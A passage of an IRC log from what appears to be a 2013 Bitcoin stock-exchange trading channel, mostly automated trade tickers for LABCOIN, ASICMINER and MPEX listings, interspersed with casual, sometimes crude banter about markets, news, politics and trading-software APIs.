15 22:48:36 [BTCTC] [LABCOIN] 20 @ 0.002671 = 0.0534 BTC [+] Sep 15 22:48:38 [BTCTC] [LABCOIN] 19 @ 0.002621 = 0.0498 BTC [-] Sep 15 22:48:39 [BTCTC] [LABCOIN] 96 @ 0.00262 = 0.2515 BTC [-] Sep 15 22:48:40 [BTCTC] [LABCOIN] 100 @ 0.00262 = 0.262 BTC [-] Sep 15 22:48:41 [BTCTC] [LABCOIN] 72 @ 0.002609 = 0.1878 BTC [-] Sep 15 22:48:43 [BTCTC] [LABCOIN] 725 @ 0.002608 = 1.8908 BTC [-] Sep 15 22:48:44 [BTCTC] [LABCOIN] 1009 @ 0.002601 = 2.6244 BTC [-] Sep 15 22:48:45 [BTCTC] [LABCOIN] 10000 @ 0.0026 = 26 BTC [-] Sep 15 22:48:46 [BTCTC] [LABCOIN] 97 @ 0.002599 = 0.2521 BTC [-] Sep 15 22:48:47 [BTCTC] [LABCOIN] 10 @ 0.002579 = 0.0258 BTC [-] Sep 15 22:48:47 [BTCTC] [LABCOIN] 100 @ 0.002578 = 0.2578 BTC [-] Sep 15 22:48:48 [BTCTC] [LABCOIN] 194 @ 0.002569 = 0.4984 BTC [-] Sep 15 22:48:49 [BTCTC] [LABCOIN] 1943 @ 0.002568 = 4.9896 BTC [-] Sep 15 22:48:50 [BTCTC] [LABCOIN] 9 @ 0.002558 = 0.023 BTC [-] Sep 15 22:48:52 [BTCTC] [LABCOIN] 99 @ 0.002557 = 0.2531 BTC [-] Sep 15 22:48:53 [BTCTC] [LABCOIN] 9 @ 0.002538 = 0.0228 BTC [-] Sep 15 22:48:54 [BTCTC] [LABCOIN] 99 @ 0.002537 = 0.2512 BTC [-] Sep 15 22:48:55 [BTCTC] [LABCOIN] 10 @ 0.002522 = 0.0252 BTC [-] Sep 15 22:48:56 [BTCTC] [LABCOIN] 464 @ 0.002518 = 1.1684 BTC [-] Sep 15 22:48:57 [BTCTC] [LABCOIN] 2000 @ 0.002517 = 5.034 BTC [-] Sep 15 22:48:57 [BTCTC] [LABCOIN] 100 @ 0.002517 = 0.2517 BTC [-] Sep 15 22:48:58 [BTCTC] [LABCOIN] 3000 @ 0.002516 = 7.548 BTC [-] Sep 15 22:48:59 [BTCTC] [LABCOIN] 195 @ 0.002516 = 0.4906 BTC [-] Sep 15 22:49:00 [BTCTC] [LABCOIN] 1000 @ 0.002515 = 2.515 BTC [-] Sep 15 22:49:01 [BTCTC] [LABCOIN] 9875 @ 0.002515 = 24.8356 BTC [-] Sep 15 22:49:02 [BTCTC] [LABCOIN] 5300 @ 0.002513 = 13.3189 BTC [-] Sep 15 22:49:03 [BTCTC] [LABCOIN] 1902 @ 0.00251 = 4.774 BTC [-] Sep 15 22:49:54 [BTCTC] [LABCOIN] 102 @ 0.002518 = 0.2568 BTC [+] Sep 15 22:50:22 [BTCTC] [LABCOIN] 22 @ 0.002591 = 0.057 BTC [+] Sep 15 22:50:24 [BTCTC] [LABCOIN] 1171 @ 0.002518 = 2.9486 BTC [-] Sep 15 22:52:05 [BTCTC] [LABCOIN] 2000 @ 0.002519 = 5.038 BTC [+] Sep 15 22:52:06 [BTCTC] [LABCOIN] 5000 @ 0.002518 = 12.59 BTC [-] Sep 15 22:52:42 [BTCTC] [TAT.ASICMINER] 22 @ 0.01968 = 0.433 BTC [-] Sep 15 22:59:50 [BTCTC] [LABCOIN] 22 @ 0.002637 = 0.058 BTC [+] Sep 15 22:59:58 [BTCTC] [LABCOIN] 222 @ 0.002521 = 0.5597 BTC [-] Sep 15 23:00:00 [BTCTC] [LABCOIN] 105 @ 0.002519 = 0.2645 BTC [-] Sep 15 23:00:01 [BTCTC] [LABCOIN] 10000 @ 0.002511 = 25.11 BTC [-] Sep 15 23:00:02 [BTCTC] [LABCOIN] 98 @ 0.00251 = 0.246 BTC [-] Sep 15 23:00:04 [BTCTC] [LABCOIN] 2385 @ 0.00251 = 5.9864 BTC [-] Sep 15 23:00:05 [BTCTC] [LABCOIN] 3750 @ 0.002505 = 9.3938 BTC [-] Sep 15 23:00:06 [BTCTC] [LABCOIN] 8440 @ 0.0025 = 21.1 BTC [-] Sep 15 23:00:08 [BTCTC] [LABCOIN] 22 @ 0.002638 = 0.058 BTC [+] Sep 15 23:00:18 [BTCTC] [LABCOIN] 22 @ 0.002628 = 0.0578 BTC [-] Sep 15 23:00:22 hahahah oh is it dump time again? Sep 15 23:00:28 [BTCTC] [LABCOIN] 2 @ 0.002628 = 0.0053 BTC [-] Sep 15 23:00:40 [BTCTC] [LABCOIN] 10 @ 0.002581 = 0.0258 BTC [-] Sep 15 23:02:28 [BTCTC] [DMS.SELLING] 1 @ 0.007046 BTC [-] Sep 15 23:03:55 [BTCTC] [LABCOIN] 1 @ 0.002716 BTC [+] Sep 15 23:06:18 [HAVELOCK] [DEALCO] 2 @ 0.00849 = 0.017 BTC [-] Sep 15 23:06:35 [HAVELOCK] [DEALCO] 1 @ 0.00849 BTC [-] Sep 15 23:08:56 [BTCTC] [DMS.SELLING] 5 @ 0.007044 = 0.0352 BTC [-] Sep 15 23:09:17 [HAVELOCK] [XBOND] 18 @ 0.00118999 = 0.0214 BTC [-] Sep 15 23:09:50 when you see asks doubling up, you know it's time! Sep 15 23:10:05 though this is only speculation Sep 15 23:10:09 [HAVELOCK] [SMG] 1589 @ 0.0002159 = 0.3431 BTC [-] Sep 15 23:10:12 [HAVELOCK] [SMG] 9 @ 0.000216 = 0.0019 BTC [+] Sep 15 23:10:18 uh nevermind, it's not even the case right now Sep 15 23:12:02 [HAVELOCK] [SMG] 5 @ 0.0002169 = 0.0011 BTC [+] Sep 15 23:13:06 [HAVELOCK] [AM1] 1 @ 1.9302 BTC [-] Sep 15 23:13:12 [HAVELOCK] [AM1] 11 @ 1.93019999 = 21.2322 BTC [-] Sep 15 23:13:16 [HAVELOCK] [AM1] 1 @ 1.93 BTC [-] Sep 15 23:13:20 [HAVELOCK] [AM1] 6 @ 1.92 = 11.52 BTC [-] Sep 15 23:13:32 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00061 = 0.0061 BTC [+] Sep 15 23:14:04 [BTCTC] [ACTIVEMINING] 150 @ 0.002658 = 0.3987 BTC [+] Sep 15 23:14:17 [HAVELOCK] [AM100] 1 @ 0.02 BTC [-] Sep 15 23:16:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.01957 = 0.1957 BTC [-] Sep 15 23:16:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.01958 = 0.1958 BTC [+] Sep 15 23:17:04 [BTCTC] [LABCOIN] 24 @ 0.002619 = 0.0629 BTC [-] Sep 15 23:17:20 [BTCTC] [LABCOIN] 24 @ 0.002614 = 0.0627 BTC [-] Sep 15 23:20:01 [BTCTC] [LABCOIN] 546 @ 0.00262 = 1.4305 BTC [+] Sep 15 23:20:02 [BTCTC] [LABCOIN] 546 @ 0.002621 = 1.4311 BTC [+] Sep 15 23:20:04 [BTCTC] [LABCOIN] 546 @ 0.002623 = 1.4322 BTC [+] Sep 15 23:20:25 [BTCTC] [LABCOIN] 200 @ 0.002623 = 0.5246 BTC [+] Sep 15 23:20:26 [BTCTC] [LABCOIN] 546 @ 0.002623 = 1.4322 BTC [+] Sep 15 23:20:28 [BTCTC] [LABCOIN] 139 @ 0.002623 = 0.3646 BTC [+] Sep 15 23:20:41 [BTCTC] [LABCOIN] 200 @ 0.002623 = 0.5246 BTC [+] Sep 15 23:20:48 [BTCTC] [LABCOIN] 319 @ 0.002623 = 0.8367 BTC [+] Sep 15 23:21:05 someone is playing with a 10k ask wall :p Sep 15 23:21:12 [BTCTC] [LABCOIN] 200 @ 0.002623 = 0.5246 BTC [+] Sep 15 23:21:22 [BTCTC] [LABCOIN] 27 @ 0.002623 = 0.0708 BTC [+] Sep 15 23:21:36 [BTCTC] [LABCOIN] 200 @ 0.002624 = 0.5248 BTC [+] Sep 15 23:21:46 [BTCTC] [LABCOIN] 200 @ 0.002624 = 0.5248 BTC [+] Sep 15 23:22:01 [BTCTC] [LABCOIN] 200 @ 0.002623 = 0.5246 BTC [-] Sep 15 23:22:10 [BTCTC] [LABCOIN] 200 @ 0.002623 = 0.5246 BTC [-] Sep 15 23:22:23 [BTCTC] [LABCOIN] 200 @ 0.002623 = 0.5246 BTC [-] Sep 15 23:22:31 [BTCTC] [LABCOIN] 200 @ 0.002623 = 0.5246 BTC [-] Sep 15 23:22:45 [BTCTC] [LABCOIN] 58 @ 0.002623 = 0.1521 BTC [-] Sep 15 23:23:02 [BTCTC] [LABCOIN] 200 @ 0.002624 = 0.5248 BTC [+] Sep 15 23:23:15 [BTCTC] [LABCOIN] 200 @ 0.002624 = 0.5248 BTC [+] Sep 15 23:23:23 [BTCTC] [LABCOIN] 200 @ 0.002624 = 0.5248 BTC [+] Sep 15 23:24:05 [BTCTC] [LABCOIN] 58 @ 0.002623 = 0.1521 BTC [-] Sep 15 23:25:31 [BTCTC] [LABCOIN] 25 @ 0.002619 = 0.0655 BTC [-] Sep 15 23:27:07 [BTCTC] [DMS.MINING] 3 @ 0.002429 = 0.0073 BTC [+] Sep 15 23:27:18 [BTCTC] [LABCOIN] 48 @ 0.002651 = 0.1272 BTC [+] Sep 15 23:27:43 [BTCTC] [LTC-ATF.B2] 10 @ 0.01089 = 0.1089 BTC [+] Sep 15 23:28:19 [BTCTC] [LABCOIN] 24 @ 0.002651 = 0.0636 BTC [+] Sep 15 23:29:12 [BTCTC] [LABCOIN] 24 @ 0.002651 = 0.0636 BTC [+] Sep 15 23:29:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00062 BTC [+] Sep 15 23:29:23 [BTCTC] [DMS.MINING] 7 @ 0.002405 = 0.0168 BTC [-] Sep 15 23:30:27 [BTCTC] [LABCOIN] 24 @ 0.002651 = 0.0636 BTC [+] Sep 15 23:30:51 [BTCTC] [DMS.MINING] 32 @ 0.002405 = 0.077 BTC [-] Sep 15 23:31:20 [BTCTC] [LABCOIN] 24 @ 0.002651 = 0.0636 BTC [+] Sep 15 23:32:57 [BTCTC] [LABCOIN] 24 @ 0.002636 = 0.0633 BTC [-] Sep 15 23:32:58 [BTCTC] [LABCOIN] 653 @ 0.002645 = 1.7272 BTC [+] Sep 15 23:32:59 [BTCTC] [LABCOIN] 58 @ 0.002647 = 0.1535 BTC [+] Sep 15 23:33:50 [BTCTC] [LABCOIN] 653 @ 0.002648 = 1.7291 BTC [+] Sep 15 23:34:10 [BTCTC] [LABCOIN] 371 @ 0.002645 = 0.9813 BTC [-] Sep 15 23:34:20 ;;estimate Sep 15 23:34:21 Next difficulty estimate | 137665065.743 based on data since last change | 137132891.907 based on data for last three days Sep 15 23:34:37 ;;bcstats Sep 15 23:34:39 ;;nethash Sep 15 23:34:40 Current Blocks: 258199 | Current Difficulty: 1.1262854866634709E8 | Next Difficulty At Block: 260063 | Next Difficulty In: 1864 blocks | Next Difficulty In About: 1 week, 3 days, 11 hours, 19 minutes, and 33 seconds | Next Difficulty Estimate: 137665065.743 | Estimated Percent Change: 22.22928 Sep 15 23:34:40 981650.455372 Sep 15 23:34:41 [BTCTC] [LABCOIN] 191 @ 0.002645 = 0.5052 BTC [-] Sep 15 23:34:41 [BTCTC] [LABCOIN] 180 @ 0.002647 = 0.4765 BTC [+] Sep 15 23:35:23 [BTCTC] [LABCOIN] 191 @ 0.002647 = 0.5056 BTC [+] Sep 15 23:35:26 [BTCTC] [LABCOIN] 110 @ 0.002647 = 0.2912 BTC [+] Sep 15 23:37:11 [BTCTC] [LABCOIN] 392 @ 0.002648 = 1.038 BTC [+] Sep 15 23:37:29 MtGox BTCUSD ticker | Best bid: 138.01564, Best ask: 138.96160, Bid-ask spread: 0.94596, Last trade: 138.96161, 24 hour volume: 6970.87661838, 24 hour low: 135.04000, 24 hour high: 141.00000, 24 hour vwap: 137.41767 Sep 15 23:37:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.01969 = 0.0591 BTC [+] Sep 15 23:38:16 [BTCTC] [DMS.MINING] 2 @ 0.002396 = 0.0048 BTC [-] Sep 15 23:38:27 [BTCTC] [LABCOIN] 322 @ 0.002645 = 0.8517 BTC [-] Sep 15 23:38:28 [BTCTC] [LABCOIN] 100 @ 0.002647 = 0.2647 BTC [+] Sep 15 23:39:05 [BTCTC] [LABCOIN] 1 @ 0.002648 BTC [+] Sep 15 23:39:14 [BTCTC] [LABCOIN] 200 @ 0.002645 = 0.529 BTC [-] Sep 15 23:39:30 [BTCTC] [LABCOIN] 122 @ 0.002645 = 0.3227 BTC [-] Sep 15 23:39:38 [BTCTC] [LABCOIN] 321 @ 0.002648 = 0.85 BTC [+] Sep 15 23:39:41 [BTCTC] [LABCOIN] 1 @ 0.002648 BTC [+] Sep 15 23:40:21 [MPEX] [S.MPOE] 12100 @ 0.00088708 = 10.7337 BTC [-] Sep 15 23:40:23 [MPEX] [S.MPOE] 1000 @ 0.00088706 = 0.8871 BTC [-] Sep 15 23:40:33 [BTCTC] [LABCOIN] 25 @ 0.002641 = 0.066 BTC [-] Sep 15 23:40:34 [BTCTC] [LABCOIN] 187 @ 0.002648 = 0.4952 BTC [+] Sep 15 23:41:09 [BTCTC] [LABCOIN] 100 @ 0.002645 = 0.2645 BTC [-] Sep 15 23:41:49 [BTCTC] [LABCOIN] 61 @ 0.002645 = 0.1613 BTC [-] Sep 15 23:41:51 [BTCTC] [LABCOIN] 100 @ 0.002647 = 0.2647 BTC [+] Sep 15 23:42:19 [BTCTC] [LABCOIN] 147 @ 0.002648 = 0.3893 BTC [+] Sep 15 23:42:52 [BTCTC] [LABCOIN] 12 @ 0.002645 = 0.0317 BTC [-] Sep 15 23:42:53 [BTCTC] [LABCOIN] 88 @ 0.002647 = 0.2329 BTC [+] Sep 15 23:43:28 [BTCTC] [LABCOIN] 12 @ 0.002647 = 0.0318 BTC [+] Sep 15 23:44:06 [BTCTC] [LABCOIN] 24 @ 0.002652 = 0.0636 BTC [+] Sep 15 23:44:21 [BTCTC] [LABCOIN] 24 @ 0.002657 = 0.0638 BTC [+] Sep 15 23:45:39 [HAVELOCK] [AM100] 10 @ 0.01894 = 0.1894 BTC [-] Sep 15 23:45:44 http://trilema.com/2013/eulora-crafting/ Sep 15 23:45:47 Eulora - Crafting pe Trilema - Un blog de Mircea Popescu. Sep 15 23:46:10 [BTCTC] [LABCOIN] 149 @ 0.0002 = 0.0298 BTC [-] Sep 15 23:46:12 [HAVELOCK] [SDSTM] 22 @ 0.0023 = 0.0506 BTC [-] Sep 15 23:46:27 [BTCTC] [LABCOIN] 100 @ 0.002693 = 0.2693 BTC [+] Sep 15 23:46:48 [BTCTC] [LABCOIN] 23 @ 0.002693 = 0.0619 BTC [+] Sep 15 23:46:49 [BTCTC] [LABCOIN] 100 @ 0.002695 = 0.2695 BTC [+] Sep 15 23:46:51 [HAVELOCK] [XBOND] 8 @ 0.00117 = 0.0094 BTC [-] Sep 15 23:47:08 [BTCTC] [LABCOIN] 100 @ 0.002695 = 0.2695 BTC [+] Sep 15 23:48:41 [BTCTC] [LABCOIN] 7 @ 0.002673 = 0.0187 BTC [-] Sep 15 23:48:54 [BTCTC] [LABCOIN] 17 @ 0.002673 = 0.0454 BTC [-] Sep 15 23:48:55 [BTCTC] [LABCOIN] 92 @ 0.002698 = 0.2482 BTC [+] Sep 15 23:49:16 [BTCTC] [LABCOIN] 7 @ 0.002698 = 0.0189 BTC [+] Sep 15 23:49:48 [BTCTC] [PAJKA.BOND] 1 @ 0.018 BTC [+] Sep 15 23:51:40 [BTCTC] [DMS.SELLING] 10 @ 0.007 = 0.07 BTC [-] Sep 15 23:53:39 [BTCTC] [LABCOIN] 1 @ 0.00269 BTC [-] Sep 15 23:56:05 [HAVELOCK] [AM100] 3 @ 0.01894 = 0.0568 BTC [-] Sep 15 23:56:16 [BTCTC] [LABCOIN] 24 @ 0.002695 = 0.0647 BTC [+] Sep 15 23:56:42 [HAVELOCK] [SMG] 2 @ 0.000216 = 0.0004 BTC [-] Sep 15 23:57:42 [MPEX] [S.MPOE] 2500 @ 0.00088398 = 2.21 BTC [-] Sep 16 00:00:26 [BTCTC] [LABCOIN] 24 @ 0.002704 = 0.0649 BTC [+] Sep 16 00:03:50 [BTCTC] [DMS.SELLING] 11 @ 0.007049 = 0.0775 BTC [+] Sep 16 00:05:40 [BTCTC] [DMS.MINING] 10 @ 0.002396 = 0.024 BTC [-] Sep 16 00:12:18 [BTCTC] [LABCOIN] 24 @ 0.00271 = 0.065 BTC [+] Sep 16 00:12:19 [BTCTC] [LABCOIN] 20 @ 0.002717 = 0.0543 BTC [+] Sep 16 00:12:19 [BTCTC] [LABCOIN] 1000 @ 0.00275 = 2.75 BTC [+] Sep 16 00:12:21 [BTCTC] [LABCOIN] 200 @ 0.00275 = 0.55 BTC [+] Sep 16 00:12:22 [BTCTC] [LABCOIN] 170 @ 0.002776 = 0.4719 BTC [+] Sep 16 00:12:23 [BTCTC] [LABCOIN] 99 @ 0.002822 = 0.2794 BTC [+] Sep 16 00:12:24 [BTCTC] [LABCOIN] 56 @ 0.002844 = 0.1593 BTC [+] Sep 16 00:12:25 [BTCTC] [LABCOIN] 75 @ 0.002866 = 0.215 BTC [+] Sep 16 00:12:28 [HAVELOCK] [LABCO] 1 @ 0.00249 BTC [+] Sep 16 00:12:52 [BTCTC] [DMS.SELLING] 30 @ 0.00705 = 0.2115 BTC [+] Sep 16 00:13:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.01963 = 0.0785 BTC [-] Sep 16 00:13:14 [BTCTC] [TAT.ASICMINER] 4 @ 0.01963 = 0.0785 BTC [-] Sep 16 00:14:46 http://btc8.com/forum.php?mod=viewthread&tid=7&page=1&extra=#pid8 Sep 16 00:14:50 apparently im big in china! Sep 16 00:14:52 for mircea_popescu http://media.npr.org/assets/img/2013/09/13/sat1_custom-361a7d9e6b851d3bae47b0eaa72aa9c82079eb21-s40-c85.jpg Sep 16 00:15:19 ThickAsThieves lol drop it on the article comment section will ya :D Sep 16 00:15:44 [BTCTC] [LTC-ATF.B2] 20 @ 0.01089 = 0.2178 BTC [+] Sep 16 00:17:00 lol nice Sep 16 00:18:06 [BTCTC] [DMS.MINING] 3 @ 0.00236 = 0.0071 BTC [-] Sep 16 00:18:17 [BTCTC] [DMS.MINING] 49 @ 0.002352 = 0.1152 BTC [-] Sep 16 00:18:41 [BTCTC] [DMS.MINING] 63 @ 0.002351 = 0.1481 BTC [-] Sep 16 00:18:43 [BTCTC] [DMS.MINING] 1 @ 0.002351 BTC [-] Sep 16 00:19:08 [BTCTC] [DMS.MINING] 100 @ 0.00235 = 0.235 BTC [-] Sep 16 00:19:11 doneski Sep 16 00:19:32 [BTCTC] [DMS.MINING] 20 @ 0.00232 = 0.0464 BTC [-] Sep 16 00:20:57 [MPEX] [S.MPOE] 5950 @ 0.00088839 = 5.2859 BTC [+] Sep 16 00:21:17 [BTCTC] [DMS.MINING] 462 @ 0.002304 = 1.0644 BTC [-] Sep 16 00:22:18 "Microsoft agrees its painfully unfunny iPhone parody ads were 'off the mark' " Sep 16 00:22:35 maybe there's still hope after all Sep 16 00:22:48 [BTCTC] [TAT.ASICMINER] 7 @ 0.01991 = 0.1394 BTC [+] Sep 16 00:23:30 [BTCTC] [DMS.MINING] 49 @ 0.002425 = 0.1188 BTC [+] Sep 16 00:23:50 nah they'll just do it again next year. Sep 16 00:23:54 except unfunnier. Sep 16 00:24:47 http://media.npr.org/assets/img/2013/09/11/cg52306bbbd0125_custom-d20b488f08329ee5a2cf53f027b376139ad9f732-s40-c85.jpg Sep 16 00:25:13 [HAVELOCK] [AM100] 1 @ 0.01894 BTC [-] Sep 16 00:25:25 hehe Sep 16 00:26:24 [HAVELOCK] [AM100] 10 @ 0.02015 = 0.2015 BTC [+] Sep 16 00:26:39 [BTCTC] [LABCOIN] 23 @ 0.002787 = 0.0641 BTC [-] Sep 16 00:27:18 [HAVELOCK] [AM100] 39 @ 0.02015 = 0.7859 BTC [+] Sep 16 00:28:44 [HAVELOCK] [XBOND] 7 @ 0.00117 = 0.0082 BTC [-] Sep 16 00:28:47 [HAVELOCK] [XBOND] 9 @ 0.0011899 = 0.0107 BTC [+] Sep 16 00:28:51 [HAVELOCK] [XBOND] 103 @ 0.00118999 = 0.1226 BTC [+] Sep 16 00:28:54 [MPEX] [S.MPOE] 1697 @ 0.00088839 = 1.5076 BTC [+] Sep 16 00:29:32 [BTCTC] [LABCOIN] 23 @ 0.002793 = 0.0642 BTC [+] Sep 16 00:31:08 [BTCTC] [LABCOIN] 4 @ 0.002866 = 0.0115 BTC [+] Sep 16 00:31:23 [MPEX] [S.MG] 2500 @ 0.0002184 = 0.546 BTC [+] Sep 16 00:31:25 [MPEX] [S.MG] 8450 @ 0.0002185 = 1.8463 BTC [+] Sep 16 00:31:40 [HAVELOCK] [XBOND] 720 @ 0.00118999 = 0.8568 BTC [+] Sep 16 00:31:42 [MPEX] [S.MG] 10000 @ 0.000219 = 2.19 BTC [+] Sep 16 00:33:20 [MPEX] [S.MPOE] 18800 @ 0.00088945 = 16.7217 BTC [+] Sep 16 00:33:51 [MPEX] [S.MPOE] 11300 @ 0.00089132 = 10.0719 BTC [+] Sep 16 00:34:16 [BTCTC] [LABCOIN] 1 @ 0.002854 BTC [-] Sep 16 00:34:45 [BTCTC] [NASTY-PT] 1 @ 0.001856 BTC [+] Sep 16 00:35:36 [BTCTC] [MININGCO.ETF] 5 @ 0.1 = 0.5 BTC [+] Sep 16 00:38:22 [BTCTC] [DMS.PURCHASE] 1 @ 0.009377 BTC [+] Sep 16 00:39:35 [BTCTC] [DMS.MINING] 10 @ 0.00243 = 0.0243 BTC [+] Sep 16 00:42:39 [BTCTC] [LABCOIN] 22 @ 0.002854 = 0.0628 BTC [-] Sep 16 00:42:40 [BTCTC] [LABCOIN] 76 @ 0.002866 = 0.2178 BTC [+] Sep 16 00:42:41 [BTCTC] [LABCOIN] 100 @ 0.002925 = 0.2925 BTC [+] Sep 16 00:42:43 [BTCTC] [LABCOIN] 100 @ 0.002926 = 0.2926 BTC [+] Sep 16 00:42:44 [BTCTC] [LABCOIN] 402 @ 0.002927 = 1.1767 BTC [+] Sep 16 00:43:41 [BTCTC] [LABCOIN] 11 @ 0.002927 = 0.0322 BTC [+] Sep 16 00:46:48 [HAVELOCK] [XBOND] 38 @ 0.00118999 = 0.0452 BTC [+] Sep 16 00:47:05 [BTCTC] [DMS.MINING] 438 @ 0.002436 = 1.067 BTC [+] Sep 16 00:47:16 [BTCTC] [DMS.MINING] 10 @ 0.002436 = 0.0244 BTC [+] Sep 16 00:47:48 [HAVELOCK] [SDSTM] 5 @ 0.00248 = 0.0124 BTC [+] Sep 16 00:49:26 [MPEX] [S.MPOE] 13200 @ 0.00089217 = 11.7766 BTC [+] Sep 16 00:49:43 [MPEX] [S.MPOE] 9428 @ 0.00089247 = 8.4142 BTC [+] Sep 16 00:49:45 [MPEX] [S.MPOE] 122 @ 0.0008928 = 0.1089 BTC [+] Sep 16 00:51:40 http://www.mediaite.com/tv/obama-to-stephanopoulos-this-isnt-the-cold-war-i-welcome-putins-involvement/ Sep 16 00:51:44 Obama to Stephanopoulos: I "Welcome" Putin's Involvement | Mediaite Sep 16 00:53:10 [HAVELOCK] [LABCO] 106 @ 0.00249 = 0.2639 BTC [+] Sep 16 00:53:37 "oh that cock how metrosexually sweet it tastes" Sep 16 00:53:39 ~ obama. Sep 16 00:54:31 ha Sep 16 00:54:32 [BTCTC] [DMS.SELLING] 49 @ 0.007055 = 0.3457 BTC [+] Sep 16 00:54:53 "just cuz i'm cold, doesn't mean I want people to think I'm cold." ~obama Sep 16 00:56:21 [HAVELOCK] [XBOND] 142 @ 0.00118 = 0.1676 BTC [-] Sep 16 00:56:44 [MPEX] [S.MPOE] 9589 @ 0.0008928 = 8.5611 BTC [+] Sep 16 00:56:46 [MPEX] [S.MPOE] 14461 @ 0.0008929 = 12.9122 BTC [+] Sep 16 00:57:20 o boy where's that kramer quote. Sep 16 00:57:57 KRAMER: What do you want me to say? That the things haven't worked out the way that I planned? That I'm struggling, barely able to keep my head above water? That L.A. is a cold place even in the middle of the summer? That it's a lonely place even when your stuck in traffic at the Hollywood Freeway? That I'm no better than a screenwriter driving a cab, a starlet turning tricks, a producer in a house he can't afford? Is Sep 16 00:57:57 that what you want me to say? Sep 16 00:57:57 GEORGE: I'd like to hear that. Sep 16 00:57:57 JERRY: Yeah... Sep 16 00:57:57 KRAMER: Well, I'm not saying that! You know, things are going pretty well for me here. I met a girl... Sep 16 00:57:57 JERRY: Kramer, she was murdered! Sep 16 00:57:57 KRAMER: Yeah, well I wasn't looking for a long term relationship. I was on TV. Sep 16 00:57:57 GEORGE: As a suspect in a serial killing. Sep 16 00:58:06 [BTCTC] [LABCOIN] 22 @ 0.002852 = 0.0627 BTC [-] Sep 16 00:58:51 [HAVELOCK] [SDSTM] 11 @ 0.00248 = 0.0273 BTC [+] Sep 16 01:00:50 [BTCTC] [LABCOIN] 22 @ 0.002886 = 0.0635 BTC [+] Sep 16 01:01:23 [BTCTC] [LABCOIN] 22 @ 0.002888 = 0.0635 BTC [+] Sep 16 01:01:52 [BTCTC] [LABCOIN] 22 @ 0.002893 = 0.0636 BTC [+] Sep 16 01:02:19 [BTCTC] [LABCOIN] 22 @ 0.002854 = 0.0628 BTC [-] Sep 16 01:02:20 [BTCTC] [LABCOIN] 22 @ 0.002847 = 0.0626 BTC [-] Sep 16 01:02:21 [BTCTC] [LABCOIN] 23 @ 0.002814 = 0.0647 BTC [-] Sep 16 01:02:22 [BTCTC] [LABCOIN] 111 @ 0.002802 = 0.311 BTC [-] Sep 16 01:02:47 [BTCTC] [LABCOIN] 20 @ 0.002926 = 0.0585 BTC [+] Sep 16 01:04:36 [MPEX] [S.MPOE] 12950 @ 0.00088885 = 11.5106 BTC [-] Sep 16 01:04:38 [HAVELOCK] [XBOND] 17 @ 0.00118 = 0.0201 BTC [-] Sep 16 01:06:01 tea party is funny http://americanoverlook.com/michelle-obama-tells-you-what-to-drink/103719?utm_campaign=20130914 Sep 16 01:06:05 [BTCTC] [ACTIVEMINING] 26 @ 0.002623 = 0.0682 BTC [-] Sep 16 01:06:07 [BTCTC] [ACTIVEMINING] 7 @ 0.002622 = 0.0184 BTC [-] Sep 16 01:06:08 [BTCTC] [ACTIVEMINING] 100 @ 0.00262 = 0.262 BTC [-] Sep 16 01:06:09 [BTCTC] [ACTIVEMINING] 667 @ 0.0026 = 1.7342 BTC [-] Sep 16 01:06:27 basically the sentiment is 'fuck you michelle for suggesting we eat better and drink water' Sep 16 01:06:42 "eat better", not really Sep 16 01:07:29 isnt that her psuedo-mission? Sep 16 01:07:31 health Sep 16 01:07:57 sure, but the actual food recommendations i've seen are pretty stupid Sep 16 01:08:01 as usual Sep 16 01:08:49 any suggestion of diet has ike a 90% chance of being better than the average american's current one Sep 16 01:08:50 focusing on drinking isn't bad though. people really should stop to drink their sugar-with-some-water stuff Sep 16 01:08:58 i find it shocking that a movement like the tea party could even exist in the INFORMATION age Sep 16 01:09:02 [HAVELOCK] [LABCO] 40 @ 0.0025 = 0.1 BTC [+] Sep 16 01:09:05 [HAVELOCK] [LABCO] 20 @ 0.00285 = 0.057 BTC [+] Sep 16 01:09:05 more water == more flouride == more acceptable host to reptilian seeding Sep 16 01:09:08 [HAVELOCK] [LABCO] 326 @ 0.00288999 = 0.9421 BTC [+] Sep 16 01:09:13 hehe Sep 16 01:10:11 add in chemtrails and we're already in the alien narcoterrorist holocaust Sep 16 01:10:20 meanwhile http://www.npr.org/blogs/health/2013/09/15/222197599/deadly-amoeba-found-for-first-time-in-municipal-water-supply Sep 16 01:10:23 [BTCTC] [ASICMINER-PT] 1 @ 2.07 BTC [+] Sep 16 01:10:36 CIPHERMINE-PT shareholder report available -> https://bitcointalk.org/index.php?topic=283947.msg3162022#msg3162022 Sep 16 01:11:05 get outta here with your information! Sep 16 01:11:52 [BTCTC] [S.BBET-PT] 2 @ 0.0015 = 0.003 BTC [+] Sep 16 01:12:38 I'm going to look into ninjatrader, coinflow just doesn't do it for me Sep 16 01:13:11 it's actually not that cool Sep 16 01:13:15 [HAVELOCK] [LABCO] 60 @ 0.00288999 = 0.1734 BTC [+] Sep 16 01:13:19 the issue is the exchanges having subpar API Sep 16 01:13:20 at least not with historical data only Sep 16 01:13:52 i want something like bitcoinwisdom for securities Sep 16 01:13:55 yeah well, and shitty proprietary trading software without an open connection for other data providers Sep 16 01:14:18 isnt that the same thing as a shitty API? Sep 16 01:14:22 does ninjatrader except a standard API? Sep 16 01:14:26 depends Sep 16 01:14:30 expect* Sep 16 01:14:39 ;;nethash Sep 16 01:14:40 980318.129037 Sep 16 01:14:49 you mean accept? :) Sep 16 01:14:57 the api of btct can be as good as it could be, but if they don't allow other providers than those who are partnered with, it's worth nothing Sep 16 01:15:03 no, expect. but accept too obviously Sep 16 01:15:09 1 yolohash in 3.. 2... Sep 16 01:15:27 [BTCTC] [DMS.MINING] 1 @ 0.002425 BTC [-] Sep 16 01:15:30 yolohash? Sep 16 01:15:35 yotta ? Sep 16 01:15:42 [BTCTC] [DMS.PURCHASE] 1 @ 0.00935 BTC [-] Sep 16 01:15:46 [HAVELOCK] [LABCO] 10 @ 0.00289 = 0.0289 BTC [+] Sep 16 01:15:47 its .99 of a yottahash Sep 16 01:16:07 persky americans, stop inventing measures and units and start dieting. Sep 16 01:16:43 I'm asking this as I could provide an API bridge, if ninjatrader can deal with one standardized API Sep 16 01:16:53 sorry, yattahash Sep 16 01:16:54 even for things that don't have an API Sep 16 01:17:17 http://letstalkbitcoin.com/bitcoin-foundation-final-debate Sep 16 01:17:21 Duffer1 what's an information age and what's the problem with the us having like one almost nonsocialist party ? Sep 